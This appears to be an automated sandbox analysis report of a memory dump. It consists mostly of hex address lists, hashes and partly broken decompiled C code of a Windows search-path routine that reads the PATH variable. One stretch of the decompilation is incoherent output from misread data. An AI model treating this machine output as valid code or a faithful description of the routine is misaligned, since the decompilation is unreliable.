                                                                  0x0494d710
                                                                  0x0494d710
                                                                  0x0494d6c1
                                                                  0x0494d6c1
                                                                  0x0494d6c1
                                                                  0x0494d6c6
                                                                  0x0499b36d
                                                                  0x0499b36f
                                                                  0x00000000
                                                                  0x0499b375
                                                                  0x0499b375
                                                                  0x0499b375
                                                                  0x00000000
                                                                  0x0499b375
                                                                  0x00000000
                                                                  0x0494d6cc
                                                                  0x0494d6d8
                                                                  0x0494d6d8
                                                                  0x0494d6d8
                                                                  0x00000000
                                                                  0x0494d6c6
                                                                  0x0494d6bf
                                                                  0x00000000
                                                                  0x0494d6da
                                                                  0x0494d6da
                                                                  0x0494d716
                                                                  0x0494d71b
                                                                  0x0494d720
                                                                  0x0494d726
                                                                  0x0494d726
                                                                  0x0494d72d
                                                                  0x00000000
                                                                  0x0494d733
                                                                  0x0494d739
                                                                  0x0494d742
                                                                  0x0494d750
                                                                  0x0494d758
                                                                  0x0494d764
                                                                  0x0494d776
                                                                  0x0494d77a
                                                                  0x0494d783
                                                                  0x0494d928
                                                                  0x0494d92c
                                                                  0x0494d93d
                                                                  0x0494d944
                                                                  0x0494d94f
                                                                  0x0494d954
                                                                  0x0494d956
                                                                  0x0494d95f
                                                                  0x0494d961
                                                                  0x0494d973
                                                                  0x0494d973
                                                                  0x0494d956
                                                                  0x0494d944
                                                                  0x0494d92c
                                                                  0x0494d78b
                                                                  0x0499b394
                                                                  0x0494d791
                                                                  0x0494d798
                                                                  0x0499b3a3
                                                                  0x0499b3bb
                                                                  0x0499b3bb
                                                                  0x0494d7a5
                                                                  0x0494d866
                                                                  0x0494d870
                                                                  0x0494d884
                                                                  0x0494d892
                                                                  0x0494d898
                                                                  0x0494d89e
                                                                  0x0494d8a0
                                                                  0x0494d8a6
                                                                  0x0494d8ac
                                                                  0x0494d8ae
                                                                  0x0494d8b4
                                                                  0x0494d8b4
                                                                  0x0494d8ae
                                                                  0x0494d7a5
                                                                  0x0494d78b
                                                                  0x0494d7b1
                                                                  0x0499b3c5
                                                                  0x0499b3c5
                                                                  0x0494d7c3
                                                                  0x0494d7ca
                                                                  0x0494d7e5
                                                                  0x0494d7eb
                                                                  0x0494d8eb
                                                                  0x0494d8ed
                                                                  0x00000000
                                                                  0x0494d8f3
                                                                  0x0494d8f3
                                                                  0x0494d8f3
                                                                  0x00000000
                                                                  0x0494d8ed
                                                                  0x0494d7cc
                                                                  0x0494d7cc
                                                                  0x0494d7d2
                                                                  0x00000000
                                                                  0x0494d7d4
                                                                  0x0494d7d4
                                                                  0x0494d7d7
                                                                  0x0494d7df
                                                                  0x0499b3d4
                                                                  0x0499b3d9
                                                                  0x0499b3dc
                                                                  0x0499b3dc
                                                                  0x0499b3df
                                                                  0x0499b3e2
                                                                  0x0499b468
                                                                  0x0499b46d
                                                                  0x0499b46f
                                                                  0x0499b46f
                                                                  0x0499b475
                                                                  0x0494d8f8
                                                                  0x0494d8f9
                                                                  0x0494d8fd
                                                                  0x0499b3e8
                                                                  0x0499b3e8
                                                                  0x0499b3eb
                                                                  0x0499b3ed
                                                                  0x00000000
                                                                  0x0499b3ef
                                                                  0x0499b3ef
                                                                  0x0499b3f1
                                                                  0x0499b3f4
                                                                  0x0499b3fe
                                                                  0x0499b404
                                                                  0x0499b409
                                                                  0x0499b40e
                                                                  0x0499b410
                                                                  0x0499b410
                                                                  0x0499b414
                                                                  0x0499b414
                                                                  0x0499b41b
                                                                  0x0499b420
                                                                  0x0499b423
                                                                  0x0499b425
                                                                  0x0499b427
                                                                  0x0499b42a
                                                                  0x0499b42d
                                                                  0x0499b42d
                                                                  0x0499b42a
                                                                  0x0499b432
                                                                  0x0499b436
                                                                  0x0499b438
                                                                  0x0499b43b
                                                                  0x0499b43b
                                                                  0x0499b449
                                                                  0x0499b44e
                                                                  0x0499b454
                                                                  0x0499b458
                                                                  0x0499b458
                                                                  0x0499b45d
                                                                  0x00000000
                                                                  0x0499b45d
                                                                  0x0499b3ed
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494d7df
                                                                  0x0494d7d2
                                                                  0x0494d7ca
                                                                  0x0499b37c
                                                                  0x0499b37e
                                                                  0x0499b385
                                                                  0x0499b38a
                                                                  0x00000000
                                                                  0x0499b38a
                                                                  0x0494d742
                                                                  0x0494d7f1
                                                                  0x0494d7f8
                                                                  0x0499b49b
                                                                  0x0499b49b
                                                                  0x0494d800
                                                                  0x0494d837
                                                                  0x0494d843
                                                                  0x0494d845
                                                                  0x0494d847
                                                                  0x0494d84a
                                                                  0x0494d84b
                                                                  0x0494d84e
                                                                  0x0494d857
                                                                  0x0494d802
                                                                  0x0494d802
                                                                  0x0494d80d
                                                                  0x00000000
                                                                  0x0494d818
                                                                  0x0494d818
                                                                  0x0494d824
                                                                  0x0494d831
                                                                  0x0499b4a5
                                                                  0x0499b4ab
                                                                  0x0499b4b3
                                                                  0x0499b4b8
                                                                  0x0499b4bb
                                                                  0x00000000
                                                                  0x0499b4c1
                                                                  0x0499b4c1
                                                                  0x0499b4c8
                                                                  0x00000000
                                                                  0x0499b4ce
                                                                  0x0499b4d4
                                                                  0x0499b4e1
                                                                  0x0499b4e3
                                                                  0x0499b4e5
                                                                  0x00000000
                                                                  0x0499b4eb
                                                                  0x0499b4f0
                                                                  0x0499b4f2
                                                                  0x0494dac9
                                                                  0x0494dacc
                                                                  0x0494dacf
                                                                  0x0494dad1
                                                                  0x0494dd78
                                                                  0x0494dd78
                                                                  0x0494dcf2
                                                                  0x00000000
                                                                  0x0494dad7
                                                                  0x0494dad9
                                                                  0x0494dadb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494dae1
                                                                  0x0494dae1
                                                                  0x0494dae4
                                                                  0x0494dae6
                                                                  0x0499b4f9
                                                                  0x0499b4f9
                                                                  0x0499b500
                                                                  0x0494daec
                                                                  0x0494daec
                                                                  0x0494daf5
                                                                  0x0494daf8
                                                                  0x0494dafb
                                                                  0x0494db03
                                                                  0x0494db11
                                                                  0x0494db16
                                                                  0x0494db19
                                                                  0x0494db1b
                                                                  0x0499b52c
                                                                  0x0499b531
                                                                  0x0499b534
                                                                  0x0494db21
                                                                  0x0494db21
                                                                  0x0494db24
                                                                  0x0494dcd9
                                                                  0x0494dce2
                                                                  0x0494dce5
                                                                  0x0494dd6a
                                                                  0x0494dd6d
                                                                  0x00000000
                                                                  0x0494dd73
                                                                  0x0499b51a
                                                                  0x0499b51c
                                                                  0x0499b51f
                                                                  0x0499b524
                                                                  0x00000000
                                                                  0x0499b524
                                                                  0x0494dce7
                                                                  0x0494dce7
                                                                  0x0494dce7
                                                                  0x00000000
                                                                  0x0494dce7
                                                                  0x00000000
                                                                  0x0494db2a
                                                                  0x0494db2c
                                                                  0x0494db31
                                                                  0x0494db33
                                                                  0x0494db36
                                                                  0x0494db39
                                                                  0x0494db3b
                                                                  0x0494db66
                                                                  0x0494db66
                                                                  0x0494db3d
                                                                  0x0494db3d
                                                                  0x0494db3e
                                                                  0x0494db46
                                                                  0x0494db47
                                                                  0x0494db49
                                                                  0x0494db4c
                                                                  0x0494db53
                                                                  0x0494db55
                                                                  0x0494db58
                                                                  0x0494db5a
                                                                  0x0499b50a
                                                                  0x0499b50f
                                                                  0x0499b512
                                                                  0x0494db60
                                                                  0x0494db60
                                                                  0x0494db63
                                                                  0x0494db63
                                                                  0x00000000
                                                                  0x0494db63
                                                                  0x0494db5a
                                                                  0x0494db3b
                                                                  0x0494db24
                                                                  0x0494db69
                                                                  0x0494db69
                                                                  0x0494db6c
                                                                  0x0494db6f
                                                                  0x0494db74
                                                                  0x0499b557
                                                                  0x0499b557
                                                                  0x0499b55e
                                                                  0x0494db7a
                                                                  0x0494db7c
                                                                  0x0494db7f
                                                                  0x0494db82
                                                                  0x0494db85
                                                                  0x00000000
                                                                  0x0494db8b
                                                                  0x0494db8b
                                                                  0x0494db8d
                                                                  0x0494db9b
                                                                  0x0494db9b
                                                                  0x0494db9d
                                                                  0x0494dba0
                                                                  0x0494dba2
                                                                  0x0494dba4
                                                                  0x0494dba7
                                                                  0x0494dba9
                                                                  0x0494dbae
                                                                  0x0494dbae
                                                                  0x0494dbb1
                                                                  0x0494dbb4
                                                                  0x0494dbb4
                                                                  0x0494dbb7
                                                                  0x0494dbba
                                                                  0x0494dcd2
                                                                  0x0494dcd4
                                                                  0x00000000
                                                                  0x0494dbc0
                                                                  0x0494dbc0
                                                                  0x0494dbd2
                                                                  0x0494dbd7
                                                                  0x0494dbda
                                                                  0x0494dbdd
                                                                  0x0494dbdf
                                                                  0x00000000
                                                                  0x0494dbe5
                                                                  0x0494dbe5
                                                                  0x0494dbee
                                                                  0x0494dbf1
                                                                  0x0499b541
                                                                  0x0499b544
                                                                  0x00000000
                                                                  0x0499b546
                                                                  0x0499b546
                                                                  0x00000000
                                                                  0x0499b546
                                                                  0x0494dbf7
                                                                  0x0494dbf7
                                                                  0x0494dbfd
                                                                  0x0494dbfd
                                                                  0x0494dbff
                                                                  0x0494dc0b
                                                                  0x0494dc15
                                                                  0x0494dc1b
                                                                  0x0494dc1d
                                                                  0x0494dc21
                                                                  0x0494dc21
                                                                  0x0494dc23
                                                                  0x0494dc23
                                                                  0x0494dc26
                                                                  0x0494dc29
                                                                  0x0494dc2b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494dc31
                                                                  0x0494dc34
                                                                  0x0494dc36
                                                                  0x0494dcbf
                                                                  0x0494dcbf
                                                                  0x0494dcc2
                                                                  0x00000000
                                                                  0x0494dc3c
                                                                  0x0494dc41
                                                                  0x0494dc43
                                                                  0x00000000
                                                                  0x0494dc45
                                                                  0x0494dc45
                                                                  0x0494dc47
                                                                  0x00000000
                                                                  0x0494dc4d
                                                                  0x0494dc4d
                                                                  0x0494dc50
                                                                  0x0494dc52
                                                                  0x0494dc55
                                                                  0x0494dcfa
                                                                  0x0494dcfe
                                                                  0x0494dd08
                                                                  0x0494dd0a
                                                                  0x0494dd0c
                                                                  0x00000000
                                                                  0x0494dd12
                                                                  0x0494dd15
                                                                  0x0494dd2d
                                                                  0x0494dd2f
                                                                  0x0494dd32
                                                                  0x0494dd35
                                                                  0x00000000
                                                                  0x0494dd35
                                                                  0x0494dc5b
                                                                  0x0494dc5b
                                                                  0x0494dc5e
                                                                  0x0494dc61
                                                                  0x0494dc64
                                                                  0x0494dc67
                                                                  0x0494dc67
                                                                  0x0494dc6a
                                                                  0x0494dc6c
                                                                  0x0494dc8e
                                                                  0x0494dc8e
                                                                  0x0494dc91
                                                                  0x0494dc93
                                                                  0x0494dcce
                                                                  0x0494dcce
                                                                  0x0494dc95
                                                                  0x0494dc9c
                                                                  0x0494dc6e
                                                                  0x0494dc72
                                                                  0x0494dc75
                                                                  0x0494dc77
                                                                  0x0494dc79
                                                                  0x0499b551
                                                                  0x0499b551
                                                                  0x00000000
                                                                  0x0494dc7f
                                                                  0x0494dc7f
                                                                  0x0494dc81
                                                                  0x00000000
                                                                  0x0494dc83
                                                                  0x0494dc86
                                                                  0x0494dc88
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494dc88
                                                                  0x0494dc81
                                                                  0x0494dc79
                                                                  0x0494dc6c
                                                                  0x0494dc55
                                                                  0x0494dc47
                                                                  0x0494dc43
                                                                  0x00000000
                                                                  0x0494dc36
                                                                  0x0494dc23
                                                                  0x00000000
                                                                  0x0494dbff
                                                                  0x0494dbf1
                                                                  0x0494dbdf
                                                                  0x0494db8f
                                                                  0x0494db92
                                                                  0x0494db95
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494db95
                                                                  0x0494db8d
                                                                  0x0494db85
                                                                  0x0494db74
                                                                  0x0494dc9f
                                                                  0x0494dca2
                                                                  0x0494dcb0
                                                                  0x0494dcb0
                                                                  0x0494dad1
                                                                  0x0499b4e5
                                                                  0x0499b4c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494d831
                                                                  0x0494d80d
                                                                  0x00000000
                                                                  0x0494d800
                                                                  0x0499b47f
                                                                  0x0499b485
                                                                  0x00000000
                                                                  0x0499b485
                                                                  0x0494d665
                                                                  0x0494d652
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PB)
                                                                  • API String ID: 0-318784073
                                                                  • Opcode ID: 695ef81f545375ee59c9a924d3b666e7942314480fad0e74d6ee3d54a5456958
                                                                  • Instruction ID: a0773c597b8ce7503a3dd3fc1f39eac365bccd35f77925a2cd242b3b10015138
                                                                  • Opcode Fuzzy Hash: 695ef81f545375ee59c9a924d3b666e7942314480fad0e74d6ee3d54a5456958
                                                                  • Instruction Fuzzy Hash: 2EE18E78A013598FEB24DF18C984F69B7BABFC5318F0442B9D9099B290D738BD81DB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04962581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E04962581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t236;
				signed int _t240;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				void* _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				void* _t337;
				void* _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				void* _t344;
				void* _t346;

				_t341 = _t343;
				_t344 = _t343 - 0x4c;
				_v8 =  *0x4a2d360 ^ _t341;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x4a2b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t326 = 0;
				_v37 = _t315;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L04954620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x4a28478;
								 *_t333 = ((0 | _t315 == 0x04a28478) - 0x00000001 & 0xfffffffb) + 7;
								E0497F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t344 = _t344 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E049C39F2(_t328);
									_t315 = _v32;
									_t328 = _t278;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t333 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t236 =  *(_v60 + _t299 * 4);
										__eflags = _t236;
										if(_t236 == 0) {
											goto L30;
										} else {
											__eflags = _t236 == 5;
											if(_t236 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t299 * 4);
										 *(_t288 + 0x18) = _t328;
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240 - 8;
										if(_t240 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t240 * 4 +  &M04962959))) {
												case 0:
													__ax =  *0x4a28488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0497F3E0(__edi,  *0x4a2848c, __ax & 0x0000ffff);
														__eax =  *0x4a28488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0497F3E0(_t328, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0x4a28480 & 0x0000ffff = E0497F3E0(__edi,  *0x4a28484,  *0x4a28480 & 0x0000ffff);
													__eax =  *0x4a28480 & 0x0000ffff;
													__eax = ( *0x4a28480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0497F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0497F3E0(_t328, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t344 = _t344 + 0xc;
													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t328 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0x4a2575c;
													__eflags = __ebx - 0x4a2575c;
													if(__ebx != 0x4a2575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0497F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4a2575c;
														} while (__ebx != 0x4a2575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4a28478 & 0x0000ffff = E0497F3E0(__edi,  *0x4a2847c,  *0x4a28478 & 0x0000ffff);
													__eax =  *0x4a28478 & 0x0000ffff;
													__eax = ( *0x4a28478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E049C39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4a26e58 & 0x0000ffff = E0497F3E0(__edi,  *0x4a26e5c,  *0x4a26e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4a26e58 & 0x0000ffff;
													__eax = ( *0x4a26e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t240 =  *(_v60 + _t326 * 4);
						if(_t240 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t240 * 4 +  &M04962935))) {
							case 0:
								__ax =  *0x4a28488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E04962E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4a28480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4a28480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0494EEF0(0x4a279a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0494EB70(__ecx, 0x4a279a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t214 = _v72;
											__eflags = _t214;
											if(_t214 != 0) {
												L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
											}
											_t215 = _v52;
											__eflags = _t215;
											if(_t215 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
													_t215 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4a27b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0494EB70(__ecx, 0x4a279a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t341;
										_pop(_t285);
										return E0497B640(_t215, _t285, _v8 ^ _t341, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t282 = E04962E3E(_t280,  &_v36);
									_t295 = _v36;
									_v76 = _t282;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x4a25764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4a28478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4a28478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4a26e58 & 0x0000ffff;
								__eax = ( *0x4a26e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t336 = _t240;
					 *((intOrPtr*)(_t336 - 0x69d81ffc)) =  *((intOrPtr*)(_t336 - 0x69d81ffc)) - _t315;
					_t337 = _t333 + 0x94;
					 *((intOrPtr*)(_t337 - 0x69d9fafc)) =  *((intOrPtr*)(_t337 - 0x69d9fafc)) - _t315;
					0x3504();
					0x8004();
					 *((intOrPtr*)(_t337 - 0x69d809fc)) =  *((intOrPtr*)(_t337 - 0x69d809fc)) - _t315;
					 *((intOrPtr*)(_t337 - 0x69d7b1fc)) =  *((intOrPtr*)(_t337 - 0x69d7b1fc)) - _t315;
					asm("daa");
					_t338 = _t336 + 0xe0;
					_t291 = 0x25;
					0x3404();
					_pop(_t346);
					0xcccc();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4a0ff00);
					E0498D08C(_t291, _t328, _t338);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t339 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t305 = _t255 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x4911664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E0497E5C0(_a8,  *((intOrPtr*)(_t305 + 0x4911668)), _t292);
									_t346 = _t346 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t339 = E049B51BE(_t292,  *((intOrPtr*)(_v48 + 0x491166c)), _a16, _t329, _t339, __eflags, _a20, _a24);
										_v52 = _t339;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t339;
						__eflags = _t339;
						if(_t339 < 0) {
							__eflags = _t339 - 0xc0000100;
							if(_t339 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t339 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t339 = E04962AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t339;
												__eflags = _t339 - 0xc0000100;
												if(_t339 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t260 = E04946600( *(_t317 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t339 = E04962C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t339;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0494EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t339 = _a24;
									_t267 = E04962AE4( &_v36, _a8, _t292, _a16, _a20, _t339);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E04962C50(_v36, _a8, _t292, _a16, _a20, _t339, 1);
									}
									_v8 = _t329;
									E04962ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t339;
					}
					L70:
					return E0498D0D1(_t253);
				}
				L108:
			}





















































                                                                  0x04962584
                                                                  0x04962586
                                                                  0x04962590
                                                                  0x04962596
                                                                  0x04962597
                                                                  0x04962598
                                                                  0x04962599
                                                                  0x0496259e
                                                                  0x049625a4
                                                                  0x049625a9
                                                                  0x049625ac
                                                                  0x049625ae
                                                                  0x049625b1
                                                                  0x049625b2
                                                                  0x049625b5
                                                                  0x049625b8
                                                                  0x049625bb
                                                                  0x049625bc
                                                                  0x049625bf
                                                                  0x049625c2
                                                                  0x049625c5
                                                                  0x049625c6
                                                                  0x049625cb
                                                                  0x049625ce
                                                                  0x049625d8
                                                                  0x049625dd
                                                                  0x049625de
                                                                  0x049625e1
                                                                  0x049625e3
                                                                  0x049625e9
                                                                  0x049626da
                                                                  0x049626da
                                                                  0x049626dd
                                                                  0x049626e2
                                                                  0x049a5b56
                                                                  0x00000000
                                                                  0x049626e8
                                                                  0x049626f9
